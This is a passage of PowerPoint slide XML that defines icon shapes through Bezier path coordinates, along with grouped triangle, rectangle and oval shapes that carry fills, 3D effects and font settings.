                        <a:pt x="18868" y="7915"/>
                        <a:pt x="18055" y="7470"/>
                        <a:pt x="17235" y="7250"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16421" y="7031"/>
                        <a:pt x="15603" y="6942"/>
                        <a:pt x="14779" y="6998"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13964" y="7059"/>
                        <a:pt x="13130" y="7236"/>
                        <a:pt x="12296" y="7545"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11462" y="7859"/>
                        <a:pt x="10625" y="8200"/>
                        <a:pt x="9782" y="8593"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8448" y="7115"/>
                        <a:pt x="7114" y="5658"/>
                        <a:pt x="5778" y="4299"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6382" y="3775"/>
                        <a:pt x="6963" y="3509"/>
                        <a:pt x="7526" y="3490"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8088" y="3467"/>
                        <a:pt x="8631" y="3523"/>
                        <a:pt x="9145" y="3649"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9669" y="3775"/>
                        <a:pt x="10149" y="3883"/>
                        <a:pt x="10590" y="3967"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11038" y="4051"/>
                        <a:pt x="11424" y="3958"/>
                        <a:pt x="11765" y="3682"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12123" y="3382"/>
                        <a:pt x="12321" y="2994"/>
                        <a:pt x="12351" y="2526"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12376" y="2054"/>
                        <a:pt x="12189" y="1596"/>
                        <a:pt x="11782" y="1147"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11258" y="569"/>
                        <a:pt x="10630" y="216"/>
                        <a:pt x="9872" y="85"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9126" y="-41"/>
                        <a:pt x="8358" y="-30"/>
                        <a:pt x="7564" y="136"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6780" y="309"/>
                        <a:pt x="6032" y="595"/>
                        <a:pt x="5324" y="997"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4617" y="1399"/>
                        <a:pt x="4048" y="1811"/>
                        <a:pt x="3626" y="2213"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3464" y="2066"/>
                        <a:pt x="3302" y="1918"/>
                        <a:pt x="3141" y="1773"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2963" y="1614"/>
                        <a:pt x="2739" y="1530"/>
                        <a:pt x="2471" y="1535"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2200" y="1535"/>
                        <a:pt x="1977" y="1647"/>
                        <a:pt x="1793" y="1853"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1615" y="2054"/>
                        <a:pt x="1530" y="2288"/>
                        <a:pt x="1565" y="2536"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1589" y="2793"/>
                        <a:pt x="1696" y="2989"/>
                        <a:pt x="1880" y="3139"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2044" y="3270"/>
                        <a:pt x="2203" y="3401"/>
                        <a:pt x="2364" y="3537"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1731" y="4276"/>
                        <a:pt x="1207" y="5094"/>
                        <a:pt x="795" y="5957"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="378" y="6820"/>
                        <a:pt x="130" y="7676"/>
                        <a:pt x="37" y="8509"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="-59" y="9346"/>
                        <a:pt x="33" y="10113"/>
                        <a:pt x="298" y="10824"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="566" y="11540"/>
                        <a:pt x="1056" y="12148"/>
                        <a:pt x="1774" y="12723"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2942" y="13658"/>
                        <a:pt x="4321" y="14056"/>
                        <a:pt x="5915" y="13967"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7507" y="13874"/>
                        <a:pt x="9223" y="13415"/>
                        <a:pt x="11064" y="12461"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12532" y="14093"/>
                        <a:pt x="14002" y="15716"/>
                        <a:pt x="15470" y="17223"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14849" y="17728"/>
                        <a:pt x="14305" y="18018"/>
                        <a:pt x="13826" y="18111"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13344" y="18210"/>
                        <a:pt x="12917" y="18200"/>
                        <a:pt x="12530" y="18088"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12142" y="17971"/>
                        <a:pt x="11782" y="17803"/>
                        <a:pt x="11455" y="17587"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11125" y="17368"/>
                        <a:pt x="10799" y="17181"/>
                        <a:pt x="10474" y="17026"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10154" y="16872"/>
                        <a:pt x="9823" y="16788"/>
                        <a:pt x="9486" y="16783"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9145" y="16778"/>
                        <a:pt x="8785" y="16937"/>
                        <a:pt x="8388" y="17265"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7981" y="17606"/>
                        <a:pt x="7777" y="18004"/>
                        <a:pt x="7777" y="18453"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7777" y="18897"/>
                        <a:pt x="7991" y="19351"/>
                        <a:pt x="8408" y="19809"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8830" y="20268"/>
                        <a:pt x="9379" y="20651"/>
                        <a:pt x="10042" y="20955"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10708" y="21259"/>
                        <a:pt x="11455" y="21451"/>
                        <a:pt x="12279" y="21502"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13103" y="21559"/>
                        <a:pt x="13970" y="21437"/>
                        <a:pt x="14886" y="21109"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15807" y="20787"/>
                        <a:pt x="16721" y="20202"/>
                        <a:pt x="17617" y="19332"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18051" y="19739"/>
                        <a:pt x="18489" y="20127"/>
                        <a:pt x="18921" y="20501"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19107" y="20656"/>
                        <a:pt x="19328" y="20731"/>
                        <a:pt x="19601" y="20712"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19861" y="20703"/>
                        <a:pt x="20090" y="20586"/>
                        <a:pt x="20269" y="20375"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20455" y="20160"/>
                        <a:pt x="20532" y="19921"/>
                        <a:pt x="20503" y="19674"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20477" y="19421"/>
                        <a:pt x="20371" y="19229"/>
                        <a:pt x="20192" y="19089"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19755" y="18752"/>
                        <a:pt x="19321" y="18397"/>
                        <a:pt x="18884" y="18022"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19626" y="17143"/>
                        <a:pt x="20221" y="16217"/>
                        <a:pt x="20664" y="15300"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21103" y="14379"/>
                        <a:pt x="21367" y="13490"/>
                        <a:pt x="21453" y="12667"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21540" y="11839"/>
                        <a:pt x="21439" y="11091"/>
                        <a:pt x="21159" y="10412"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20880" y="9725"/>
                        <a:pt x="20386" y="9135"/>
                        <a:pt x="19678" y="8570"/>
                      </a:cubicBezTo>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15" name="AutoShape 54"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8375650" y="2896394"/>
                  <a:ext cx="70644" cy="73819"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="+- 0 10791 197"/>
                    <a:gd name="T1" fmla="*/ T0 w 21188"/>
                    <a:gd name="T2" fmla="+- 0 10794 193"/>
                    <a:gd name="T3" fmla="*/ 10794 h 21203"/>
                    <a:gd name="T4" fmla="+- 0 10791 197"/>
                    <a:gd name="T5" fmla="*/ T4 w 21188"/>
                    <a:gd name="T6" fmla="+- 0 10794 193"/>
                    <a:gd name="T7" fmla="*/ 10794 h 21203"/>
                    <a:gd name="T8" fmla="+- 0 10791 197"/>
                    <a:gd name="T9" fmla="*/ T8 w 21188"/>
                    <a:gd name="T10" fmla="+- 0 10794 193"/>
                    <a:gd name="T11" fmla="*/ 10794 h 21203"/>
                    <a:gd name="T12" fmla="+- 0 10791 197"/>
                    <a:gd name="T13" fmla="*/ T12 w 21188"/>
                    <a:gd name="T14" fmla="+- 0 10794 193"/>
                    <a:gd name="T15" fmla="*/ 10794 h 21203"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T1" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T5" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T9" y="T11"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T13" y="T15"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21188" h="21203">
                      <a:moveTo>
                        <a:pt x="17615" y="468"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="17606" y="468"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="14870" y="2476"/>
                        <a:pt x="12200" y="4590"/>
                        <a:pt x="9727" y="6958"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7348" y="9227"/>
                        <a:pt x="5200" y="11619"/>
                        <a:pt x="3329" y="14060"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="341" y="17962"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="350" y="17970"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="-197" y="18786"/>
                        <a:pt x="-106" y="19880"/>
                        <a:pt x="638" y="20590"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1491" y="21407"/>
                        <a:pt x="2889" y="21407"/>
                        <a:pt x="3746" y="20590"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3877" y="20460"/>
                        <a:pt x="3984" y="20321"/>
                        <a:pt x="4069" y="20174"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="6867" y="16517"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="8601" y="14255"/>
                        <a:pt x="10606" y="12027"/>
                        <a:pt x="12824" y="9913"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15281" y="7570"/>
                        <a:pt x="17557" y="5758"/>
                        <a:pt x="20329" y="3749"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="20321" y="3741"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="20400" y="3684"/>
                        <a:pt x="20473" y="3635"/>
                        <a:pt x="20543" y="3570"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21402" y="2753"/>
                        <a:pt x="21402" y="1427"/>
                        <a:pt x="20543" y="606"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19742" y="-161"/>
                        <a:pt x="18472" y="-193"/>
                        <a:pt x="17615" y="468"/>
                      </a:cubicBezTo>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16" name="AutoShape 55"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8448675" y="2649538"/>
                  <a:ext cx="71438" cy="74613"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="+- 0 10803 213"/>
                    <a:gd name="T1" fmla="*/ T0 w 21180"/>
                    <a:gd name="T2" fmla="+- 0 10801 203"/>
                    <a:gd name="T3" fmla="*/ 10801 h 21196"/>
                    <a:gd name="T4" fmla="+- 0 10803 213"/>
                    <a:gd name="T5" fmla="*/ T4 w 21180"/>
                    <a:gd name="T6" fmla="+- 0 10801 203"/>
                    <a:gd name="T7" fmla="*/ 10801 h 21196"/>
                    <a:gd name="T8" fmla="+- 0 10803 213"/>
                    <a:gd name="T9" fmla="*/ T8 w 21180"/>
                    <a:gd name="T10" fmla="+- 0 10801 203"/>
                    <a:gd name="T11" fmla="*/ 10801 h 21196"/>
                    <a:gd name="T12" fmla="+- 0 10803 213"/>
                    <a:gd name="T13" fmla="*/ T12 w 21180"/>
                    <a:gd name="T14" fmla="+- 0 10801 203"/>
                    <a:gd name="T15" fmla="*/ 10801 h 21196"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T1" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T5" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T9" y="T11"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T13" y="T15"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21180" h="21196">
                      <a:moveTo>
                        <a:pt x="8372" y="11356"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="6122" y="13508"/>
                        <a:pt x="3675" y="15444"/>
                        <a:pt x="1144" y="17292"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="963" y="17388"/>
                        <a:pt x="786" y="17493"/>
                        <a:pt x="637" y="17645"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="-213" y="18457"/>
                        <a:pt x="-213" y="19774"/>
                        <a:pt x="637" y="20585"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1464" y="21380"/>
                        <a:pt x="2796" y="21397"/>
                        <a:pt x="3652" y="20641"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="3665" y="20649"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="6364" y="18673"/>
                        <a:pt x="8988" y="16581"/>
                        <a:pt x="11419" y="14263"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13759" y="12030"/>
                        <a:pt x="15873" y="9685"/>
                        <a:pt x="17715" y="7283"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="20663" y="3427"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="20654" y="3419"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="21386" y="2600"/>
                        <a:pt x="21357" y="1379"/>
                        <a:pt x="20541" y="608"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19697" y="-203"/>
                        <a:pt x="18323" y="-203"/>
                        <a:pt x="17468" y="608"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17313" y="760"/>
                        <a:pt x="17197" y="937"/>
                        <a:pt x="17094" y="1114"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="14228" y="4857"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="12526" y="7090"/>
                        <a:pt x="10552" y="9275"/>
                        <a:pt x="8372" y="11356"/>
                      </a:cubicBezTo>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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="25" name="Group 26"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5338" y="2772"/>
              <a:ext cx="2054" cy="3672"/>
              <a:chOff x="5960997" y="2484779"/>
              <a:chExt cx="1304471" cy="2341845"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="26" name="Group 27"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5960997" y="2484779"/>
                <a:ext cx="1304471" cy="2341845"/>
                <a:chOff x="5960997" y="2484779"/>
                <a:chExt cx="1304471" cy="2341845"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="28" name="Group 29"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5960997" y="2484779"/>
                  <a:ext cx="1304471" cy="1802479"/>
                  <a:chOff x="3149600" y="2480384"/>
                  <a:chExt cx="1201204" cy="1660005"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="30" name="等腰三角形 51"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm flipV="1">
                    <a:off x="3149600" y="3200883"/>
                    <a:ext cx="1201204" cy="939506"/>
                  </a:xfrm>
                  <a:prstGeom prst="triangle">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:schemeClr val="accent3"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="EEECE1">
                          <a:lumMod val="90000"/>
                          <a:alpha val="0"/>
                        </a:srgbClr>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="0"/>
                  </a:gradFill>
                  <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="31" name="矩形 52"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="3630724" y="2480384"/>
                    <a:ext cx="720080" cy="720080"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="accent3"/>
                  </a:solidFill>
                  <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst>
                    <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                      <a:srgbClr val="000000">
                        <a:alpha val="35000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:scene3d>
                    <a:camera prst="isometricOffAxis2Top">
                      <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                    </a:camera>
                    <a:lightRig rig="chilly" dir="t">
                      <a:rot lat="0" lon="0" rev="600000"/>
                    </a:lightRig>
                  </a:scene3d>
                  <a:sp3d extrusionH="666750"/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="29" name="Oval 30"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6312532" y="4240732"/>
                  <a:ext cx="585892" cy="585892"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln w="3810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id-ID"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="27" name="AutoShape 112"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6453017" y="4367800"/>
                <a:ext cx="328308" cy="328869"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T1" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T2" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T3" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T4" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T5" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T6" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T7" fmla="*/ 10800 h 21600"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="21020" h="21600">
                    <a:moveTo>
                      <a:pt x="18846" y="7946"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="17740" y="9091"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="17740" y="8939"/>
                      <a:pt x="17758" y="8792"/>
                      <a:pt x="17744" y="8636"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17629" y="7331"/>
                      <a:pt x="17036" y="6068"/>
                      <a:pt x="16074" y="5080"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15004" y="3980"/>
                      <a:pt x="13585" y="3348"/>
                      <a:pt x="12180" y="3345"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13268" y="2218"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="13812" y="1659"/>
                      <a:pt x="14572" y="1350"/>
                      <a:pt x="15403" y="1350"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16460" y="1350"/>
                      <a:pt x="17546" y="1840"/>
                      <a:pt x="18381" y="2696"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19165" y="3500"/>
                      <a:pt x="19631" y="4499"/>
                      <a:pt x="19698" y="5510"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19760" y="6453"/>
                      <a:pt x="19457" y="7317"/>
                      <a:pt x="18846" y="7946"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="5828" y="19329"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5813" y="18424"/>
                      <a:pt x="5454" y="17481"/>
                      <a:pt x="4730" y="16739"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4046" y="16034"/>
                      <a:pt x="3150" y="15628"/>
                      <a:pt x="2257" y="15592"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2911" y="13157"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2959" y="12995"/>
                      <a:pt x="3052" y="12835"/>
                      <a:pt x="3168" y="12695"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4485" y="11726"/>
                      <a:pt x="6512" y="12012"/>
                      <a:pt x="7920" y="13460"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9409" y="14990"/>
                      <a:pt x="9639" y="17230"/>
                      <a:pt x="8492" y="18568"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8416" y="18609"/>
                      <a:pt x="8339" y="18648"/>
                      <a:pt x="8256" y="18675"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8256" y="18675"/>
                      <a:pt x="5828" y="19329"/>
                      <a:pt x="5828" y="19329"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="2737" y="20164"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2665" y="20181"/>
                      <a:pt x="2443" y="20239"/>
                      <a:pt x="2291" y="20249"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1751" y="20244"/>
                      <a:pt x="1313" y="19792"/>
                      <a:pt x="1313" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1321" y="19124"/>
                      <a:pt x="1365" y="18929"/>
                      <a:pt x="1380" y="18857"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2071" y="16283"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2822" y="16261"/>
                      <a:pt x="3630" y="16562"/>
                      <a:pt x="4265" y="17215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4911" y="17878"/>
                      <a:pt x="5214" y="18725"/>
                      <a:pt x="5181" y="19504"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5181" y="19504"/>
                      <a:pt x="2737" y="20164"/>
                      <a:pt x="2737" y="20164"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="6888" y="11179"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="6280" y="10927"/>
                      <a:pt x="5642" y="10783"/>
                      <a:pt x="5004" y="10774"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="10063" y="5536"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10838" y="4759"/>
                      <a:pt x="11966" y="4536"/>
                      <a:pt x="13077" y="4819"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13077" y="4819"/>
                      <a:pt x="6888" y="11179"/>
                      <a:pt x="6888" y="11179"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="9717" y="13672"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="9473" y="13258"/>
                      <a:pt x="9194" y="12859"/>
                      <a:pt x="8848" y="12505"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8447" y="12093"/>
                      <a:pt x="7986" y="11770"/>
                      <a:pt x="7507" y="11498"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13767" y="5064"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="14259" y="5288"/>
                      <a:pt x="14729" y="5607"/>
                      <a:pt x="15145" y="6035"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15500" y="6398"/>
                      <a:pt x="15775" y="6806"/>
                      <a:pt x="15987" y="7229"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15987" y="7229"/>
                      <a:pt x="9717" y="13672"/>
